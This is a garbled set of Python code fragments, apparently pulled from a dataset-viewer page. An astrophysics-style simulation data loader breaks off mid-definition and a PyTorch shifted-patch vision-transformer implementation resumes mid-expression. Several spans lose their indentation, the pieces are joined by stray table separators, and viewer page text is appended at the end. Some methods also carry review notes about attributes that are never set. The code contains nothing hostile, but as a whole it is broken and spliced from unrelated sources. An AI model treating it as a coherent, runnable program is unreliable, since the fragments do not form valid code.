                iterations.append(it)
                # Convert code time to physical time; the factor is presumably
                # geometric units -> ms, then /1000 -> seconds — TODO confirm.
                time = dset.get_time(it) * 0.004925794970773136 / 1000
                times.append(time)
                # print("it:{}, time:{}".format(it, time))
        # Expect one unique time per unique iteration.
        assert len(list(set(iterations))) == len(list(set(times)))
        iterations = np.sort(list(set(iterations)))
        times = np.sort(list(set(times)))
        return iterations, times

    def set_all_it_times_from_outputs(self, plane, v_n):
        """Overwrite self.iterations / self.times from the loaded datasets."""
        self.iterations, self.times = self.get_all_iterations_times(plane, v_n)
        print('\tIterations [{}->{}] and times [{:.3f}->{:.3f}] have been reset.'
              .format(self.iterations[0], self.iterations[-1],
                      self.times[0], self.times[-1]))

    # return list(set([item for sublist in iterations for item in sublist])), \
    #        list(set([item for sublist in iterations for item in sublist]))

    # def get_all_timesteps(self, plane, v_n):
    #
    #     iterations = self.get_all_iterations(plane, v_n)
    #     times = []
    #     for iteration in iterations:
    #         times.append(self.get_time(iteration))
    #     return times
class EXTRACT_STORE_DATA(LOAD_STORE_DATASETS):
"""
blablabla
"""
def __init__(self, sim, | |
> 0. else nn.Identity()
self.norm2 = norm_layer(dim)
mlp_hidden_dim = int(dim * mlp_ratio)
self.num_variants = num_variants
self.embedding_dim = dim
self.mlp_hidden_dim = mlp_hidden_dim
for i in range(depth):
self.layers.append(nn.ModuleList([
Attention(num_variants, dim, num_heads=num_heads, qkv_bias=qkv_bias, qk_scale=qk_scale, attn_drop=attn_drop, proj_drop=proj_drop) if not i == 0
else Attention_variants(num_variants, dim, num_heads=num_heads, qkv_bias=qkv_bias, qk_scale=qk_scale, attn_drop=attn_drop, proj_drop=proj_drop),
Mlp(in_features=dim, hidden_features=mlp_hidden_dim, act_layer=act_layer, drop=proj_drop)
]))
trunc_normal_(self.pos_emb, std=.02)
    def forward(self, patches):
        """
        Run the layer stack over the first patch variant, fusing all variants
        in the first layer.

        Args:
            patches: tensor of shape (num_variants, B, num_patches, embedding_dim).

        Returns:
            Tensor of shape (B, num_patches, embedding_dim) — the processed
            first-variant stream.
        """
        num_variants, B, num_patches, embedding_dim = patches.shape
        assert num_variants == self.num_variants
        assert embedding_dim == self.embedding_dim
        # Add the shared positional embedding to every variant (transpose so
        # broadcasting lines up, then transpose back).
        patches = patches.transpose(0, 1) # 128, 44, 64, 16, 192
        pos_emb = self.pos_emb.unsqueeze(dim=0)
        patches = patches + pos_emb
        patches = patches.transpose(0, 1)
        # Only the first (unshifted) variant is carried forward as the stream.
        x = patches[0]
        num_layer = 0
        for attn, mlp in self.layers:
            if num_layer == 0:
                # Layer 0 attends from the stream to ALL variants
                # (cross-variant attention; see Attention_variants in __init__).
                x = x + self.drop_path(attn(self.norm1(x), self.norm1(patches), num_layer=num_layer))
            else:
                x = x + self.drop_path(attn(self.norm1(x), num_layer=num_layer))
            x = x + self.drop_path(mlp(self.norm2(x)))
            num_layer += 1
        #x = x.unsqueeze(dim=0)
        #patches = torch.cat((x, patches[1:]))
        return x
    def flops(self):
        """
        Rough FLOP count over all layers: attention + two LayerNorms + MLP
        (two matmuls dim <-> mlp_hidden_dim) per layer.

        NOTE(review): relies on self.num_patches and self.dim being set by
        __init__ (not visible here) — confirm.
        """
        flops = 0
        print("transfomer flops")
        for attn, mlp in self.layers:
            flops += attn.flops(self.num_patches)
            # norm1
            flops += self.num_patches * self.dim
            # MLP: two linear layers dim -> hidden -> dim
            flops += 2* self.num_patches * self.dim * self.mlp_hidden_dim
            # norm2
            flops += self.num_patches * self.dim
        return flops
class Transformer(nn.Module):
    """Plain pre-norm transformer encoder over a patch sequence.

    Each of `depth` layers applies Attention then an MLP, both wrapped in a
    residual connection with stochastic depth; LayerNorm is applied before
    each sub-module (pre-norm). A learned positional embedding is added once
    on entry.
    """

    def __init__(self, num_variants, num_patches, depth, dim, num_heads, mlp_ratio=4., qkv_bias=False, qk_scale=None, proj_drop=0., attn_drop=0.,
                 drop_path=0., act_layer=nn.GELU, norm_layer=partial(nn.LayerNorm, eps=1e-6)):
        super().__init__()
        self.norm1 = norm_layer(dim)
        self.num_patches = num_patches
        self.dim = dim
        self.layers = nn.ModuleList([])
        # Learned positional embedding, shared across the batch.
        self.pos_emb = nn.Parameter(torch.zeros(num_patches, dim))
        self.drop_path = DropPath(drop_path) if drop_path > 0. else nn.Identity()
        self.norm2 = norm_layer(dim)
        hidden = int(dim * mlp_ratio)
        self.num_variants = num_variants
        self.embedding_dim = dim
        self.mlp_hidden_dim = hidden
        for _ in range(depth):
            layer = nn.ModuleList([
                Attention(num_variants, dim, num_heads=num_heads, qkv_bias=qkv_bias, qk_scale=qk_scale, attn_drop=attn_drop, proj_drop=proj_drop),
                Mlp(in_features=dim, hidden_features=hidden, act_layer=act_layer, drop=proj_drop),
            ])
            self.layers.append(layer)
        trunc_normal_(self.pos_emb, std=.02)

    def forward(self, x):
        """Add positional embedding, then run every attention/MLP layer.

        Args:
            x: tensor of shape (B, num_patches, embedding_dim).
        Returns:
            Tensor of the same shape.
        """
        _, _, embedding_dim = x.shape
        assert embedding_dim == self.embedding_dim
        x = x + self.pos_emb.unsqueeze(dim=0)
        for idx, (attn, mlp) in enumerate(self.layers):
            x = x + self.drop_path(attn(self.norm1(x), num_layer=idx))
            x = x + self.drop_path(mlp(self.norm2(x)))
        return x

    def flops(self):
        """Rough FLOP count; prints the running total (in GFLOPs) per component."""
        total = 0
        print("transfomer flops")
        for attn, mlp in self.layers:
            # attention
            print("num patches: ", self.num_patches)
            total += attn.flops(self.num_patches)
            print("attention flops: ", total / 1e9)
            # first LayerNorm
            total += self.num_patches * self.dim
            print("norm flops: ", total / 1e9)
            # MLP: two matmuls dim -> hidden -> dim
            total += 2 * self.num_patches * self.dim * self.mlp_hidden_dim
            print("mlp flops: ", total / 1e9)
            # second LayerNorm
            total += self.num_patches * self.dim
            print("norm flops: ", total / 1e9)
        return total
class PatchEmbed(nn.Module):
    """2D Image to Patch Embedding over NUM_VARIANTS shifted copies of the input.

    Projection 0 embeds the image as-is; the remaining projections embed copies
    of the image circularly rolled by the offsets in `paddings`, yielding a
    stacked tensor of shape (NUM_VARIANTS, B, num_patches, embed_dim).
    """

    def __init__(self, img_size=224, patch_size=16, stride_size=1, padding_size=1, in_chans=3, embed_dim=768, norm_layer=None):
        super().__init__()
        img_size = (img_size, img_size)
        patch_size = (patch_size, patch_size)
        self.img_size = img_size
        self.patch_size = patch_size
        # NOTE(review): grid_size is derived from patch_size only and ignores
        # stride_size/padding_size even though the convs use them — confirm
        # callers keep kernel/stride/padding consistent with this.
        self.grid_size = (img_size[0] // patch_size[0], img_size[1] // patch_size[1])
        self.num_patches = self.grid_size[0] * self.grid_size[1]
        self.embed_dim = embed_dim
        # Fix: flops() reads this attribute; it was never stored before
        # (AttributeError at runtime).
        self.in_chans = in_chans
        # One conv projection per shifted image variant.
        self.projections = nn.ModuleList([])
        for _ in range(NUM_VARIANTS):
            self.projections.append(
                nn.Conv2d(in_chans, embed_dim, kernel_size=patch_size, stride=stride_size, padding=padding_size)
            )
        self.norm = norm_layer(embed_dim) if norm_layer else nn.Identity()

    def forward(self, img):
        """Embed `img` and its shifted variants.

        Args:
            img: tensor of shape (B, C, H, W); H, W must equal img_size.
        Returns:
            Tensor of shape (NUM_VARIANTS, B, num_patches, embed_dim).
        """
        B, C, H, W = img.shape
        assert H == self.img_size[0] and W == self.img_size[1], \
            f"Input image size ({H}*{W}) doesn't match model ({self.img_size[0]}*{self.img_size[1]})."
        patches = []
        # Unshifted variant uses projection 0.
        new_patch = self.norm(self.projections[0](img))
        patches.append(new_patch.flatten(2).transpose(1, 2))
        # 17 circular shifts; together with the unshifted image this assumes
        # NUM_VARIANTS == 18 — TODO confirm against the module-level constant.
        paddings = [(1, 0), (0, 1), (-1, 0), (0, -1), (2, 0), (0, 2), (-2, 0), (0, -2),
                    (1, 1), (1, 2), (1, -1), (-1, 1), (-1, 2), (-1, -1), (2, 1),
                    (2, 2), (2, -1)]
        for i, cur_padding in enumerate(paddings):
            img_new = torch.roll(img, shifts=cur_padding, dims=(2, 3))
            new_patch = self.norm(self.projections[i + 1](img_new))
            patches.append(new_patch.flatten(2).transpose(1, 2))
        return torch.stack(patches)

    def flops(self):
        """FLOPs of all patch projections plus the per-patch norm.

        Fixes two defects of the original: it referenced the never-set
        attribute `in_chans` (AttributeError) and it overwrote `flops` inside
        a `for i in range(10)` loop instead of accumulating over the
        projections actually applied in forward().
        """
        Ho, Wo = self.grid_size
        # Conv projection: one (patch_size^2 * in_chans) dot product per
        # output element, plus the norm over embed_dim per patch.
        per_proj = Ho * Wo * self.embed_dim * self.in_chans * (self.patch_size[0] * self.patch_size[1])
        per_proj += Ho * Wo * self.embed_dim
        return len(self.projections) * per_proj
class ShiftingTransformer(nn.Module):
    """Hierarchical vision transformer over shifted-patch variants.

    Builds a pyramid of `num_hierarchies` stages. The first (deepest level)
    stage is a Transformer_first that fuses the stacked shifted-patch
    embeddings produced by PatchEmbed; subsequent stages are plain
    Transformers. Between stages, Reduce_image_size shrinks the token grid.
    Classification mean-pools the final tokens into a linear head.
    """

    def __init__(self,*, scaling_factor, output_dir, num_variants, image_size,patch_size,num_classes,embedding_dim,heads,num_hierarchies,num_layers_per_block, mlp_mult = 4,channels = 3, dim_head = 64, qkv_bias=True,attn_drop=0.0,
                 proj_drop=0.0,stochastic_depth_drop = 0.1 , init_patch_embed_size =1, kernel_size=3, stride_size=1, padding_size=1):
        """
        :param scaling_factor: token-count reduction factor between stages
        :param output_dir: directory where pyramid_parameters.txt is appended
        :param embedding_dim: sequence of (dim_in, dim_out) pairs, one per stage
        :param num_layers_per_block: transformer depth per stage
        Other parameters are forwarded to PatchEmbed / the stage transformers.
        """
        super().__init__()
        assert (image_size % patch_size) == 0, 'Image dimensions must be divisible by the patch size.'
        fmap_size = image_size // patch_size
        len_pyramid = len(num_layers_per_block)
        input_size_after_patch = image_size // init_patch_embed_size
        initial_num_blocks = fmap_size * fmap_size
        assert input_size_after_patch % patch_size == 0
        down_sample_ratio = input_size_after_patch // patch_size
        # assert len_pyramid == int(torch.log( torch.tensor([down_sample_ratio]).to(torch.float32))
        #                           / torch.log(torch.tensor([2]).to(torch.float32)) + 1)
        self.patch_size = patch_size
        self.kernel_size = kernel_size
        self.stride_size = stride_size
        self.padding_size= padding_size
        self.num_hierarchies = num_hierarchies
        # Stage levels in decreasing order; level 0 is the last (coarsest) stage.
        hierarchies = list(reversed(range(num_hierarchies)))
        layer_heads = heads
        # layer_dims = list(map(lambda t: t * dim, mults))
        layer_dims = embedding_dim
        self.start_embedding = embedding_dim[0][0]
        self.end_embedding = embedding_dim[-1][-1]
        # dim_pairs = zip(layer_dims[:-1], layer_dims[1:])
        num_blocks = (initial_num_blocks, initial_num_blocks, initial_num_blocks , initial_num_blocks)
        # NOTE(review): seq_len is only defined for 3 or 4 hierarchies; any
        # other value raises NameError below — confirm intended restriction.
        if num_hierarchies == 4:
            seq_len = (initial_num_blocks, initial_num_blocks//(scaling_factor), initial_num_blocks//(scaling_factor**2), initial_num_blocks//(scaling_factor**3))
        elif num_hierarchies == 3:
            seq_len = (initial_num_blocks, initial_num_blocks//(scaling_factor), initial_num_blocks//(scaling_factor**2))
        self.end_num_patches = seq_len[-1]
        self.to_patch_embedding = PatchEmbed(img_size=image_size, patch_size=self.kernel_size, stride_size=self.stride_size, padding_size=padding_size, in_chans=3,
                                             embed_dim=self.start_embedding)
        # Broadcast scalar/short configs to one entry per stage.
        block_repeats = cast_tuple(num_layers_per_block, num_hierarchies)
        layer_heads = cast_tuple(layer_heads, num_hierarchies)
        num_blocks = cast_tuple(num_blocks, num_hierarchies)
        seq_lens = cast_tuple(seq_len, num_hierarchies)
        dim_pairs = cast_tuple(layer_dims,num_hierarchies)
        self.layers = nn.ModuleList([])
        # print("build pyramid: ")
        # print("levels:", hierarchies, "heds: ", layer_heads, "dim paors: ", dim_pairs, "block repeats: ", block_repeats, "num blocks: ", num_blocks)
        for level, heads, (dim_in, dim_out), block_repeat, seq_len in zip(hierarchies, layer_heads, dim_pairs, block_repeats,seq_lens):
            print("level: ", level, "heads: ", heads, "dim in dim out: ", (dim_in, dim_out),
                  "block repeat: ", block_repeat,"seq len: ", seq_len)
            # Append this stage's configuration to a human-readable log file.
            with open(output_dir + "/pyramid_parameters.txt", "a+") as text_file:
                text_file.write(" level: ")
                text_file.write(str(level))
                text_file.write(" heads: ")
                text_file.write(str(heads))
                text_file.write(" dim in: ")
                text_file.write(str(dim_in))
                text_file.write(" dim out: ")
                text_file.write(str(dim_out))
                text_file.write(" block repeat: ")
                text_file.write(str(block_repeat))
                text_file.write(" seq len: ")
                text_file.write(str(seq_len))
                text_file.write("\n")
            is_last = level == 0
            depth = block_repeat
            is_first = level == (num_hierarchies-1)
            print("is first: ", is_first, "is last: ", is_last)
            self.layers.append(nn.ModuleList([
                Transformer(num_variants, seq_len, depth, dim_in, heads, mlp_mult, qkv_bias=qkv_bias, attn_drop=attn_drop,
                            drop_path=stochastic_depth_drop, proj_drop=proj_drop) if not is_first else
                Transformer_first(num_variants, seq_len, depth, dim_in, heads, mlp_mult, qkv_bias=qkv_bias, attn_drop=attn_drop,
                                  drop_path=stochastic_depth_drop, proj_drop=proj_drop),
                Reduce_image_size(dim_in, dim_out, seq_len) if not is_last else nn.Identity()
            ]))
        self.norm = partial(nn.LayerNorm, eps=1e-6)(self.end_embedding)
        self.mlp_head = nn.Linear(self.end_embedding, num_classes)
        self.apply(_init_vit_weights)
        # NOTE(review): the `with` block already closed the file; this re-closes
        # the handle from the LAST loop iteration (a no-op) and raises NameError
        # if the loop never ran — confirm it can be removed.
        text_file.close()

    def forward(self, img):
        """Classify a batch of images; returns logits of shape (B, num_classes)."""
        # input shape: 128, 3, 32 , 32
        # print("input size: ", img.shape)
        patches = self.to_patch_embedding(img) # 44, 128, 256,192
        # print("x after embedding: ", patches.shape)
        num_hierarchies = len(self.layers)
        for level, (transformer, reduce_image_size) in zip(reversed(range(num_hierarchies)), self.layers):
            patches = transformer(patches)
            if level > 0:
                # Tokens -> image plane, spatial downsample, -> tokens again.
                # Assumes the token count is a perfect square — TODO confirm.
                grid_size = (int(patches.shape[1]**0.5), int(patches.shape[1]**0.5))
                patches = to_image_plane(patches, grid_size, self.patch_size)
                patches = reduce_image_size(patches)
                patches = to_patches_plane(patches, self.patch_size)
        patches = self.norm(patches)
        # Global average pool over the token dimension.
        patches_pool = torch.mean(patches, dim=(1))
        return self.mlp_head(patches_pool)

    def flops(self):
        """Total FLOP estimate; prints running totals in GFLOPs.

        NOTE(review): self.num_classes is never assigned in __init__ (only
        mlp_head uses it), so the final MLP term raises AttributeError —
        confirm and store it in __init__.
        """
        flops = 0
        flops += self.to_patch_embedding.flops()
        print(flops/ 1e9)
        for level, (transformer, reduce_image_size) in zip(reversed(range(len(self.layers))), self.layers):
            flops += transformer.flops()
            print(flops/ 1e9)
            if level > 0:
                flops += reduce_image_size.flops()
                print(flops/ 1e9)
        # last norm
        flops += self.end_embedding * self.end_num_patches
        print(flops/ 1e9)
        # MLP
        flops += self.end_embedding * self.num_classes
        print(flops/ 1e9)
        return flops
def to_patches_plane(x, patch_size):
    """Convert an image-plane tensor into a token sequence.

    Args:
        x: tensor of shape (batch, depth, height, width).
        patch_size: unused; kept for call-site compatibility (the original
            built a (patch_size, patch_size) tuple and never used it — that
            dead statement is removed here).

    Returns:
        Tensor of shape (batch, height*width, depth).
    """
    batch, depth, height, width = x.shape
    # Flatten the spatial grid into one axis, then move channels last.
    x = x.reshape(batch, depth, height * width)
    return x.permute(0, 2, 1)
def to_image_plane(x, grid_size, patch_size):
batch, num_patches, depth = x.shape # 128, 256, 192
x = x.permute(0,2,1) # 128, 192, 256
x = x.reshape(batch, depth, grid_size[0], grid_size[1])
return x
def _init_vit_weights(m, n: str = '', head_bias: float = 0., jax_impl: bool = False):
""" ViT weight initialization
* When called without n, head_bias, jax_impl args it will behave exactly the same
as my original init for compatibility with prev hparam / downstream use cases (ie DeiT).
* When called w/ valid n (module |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.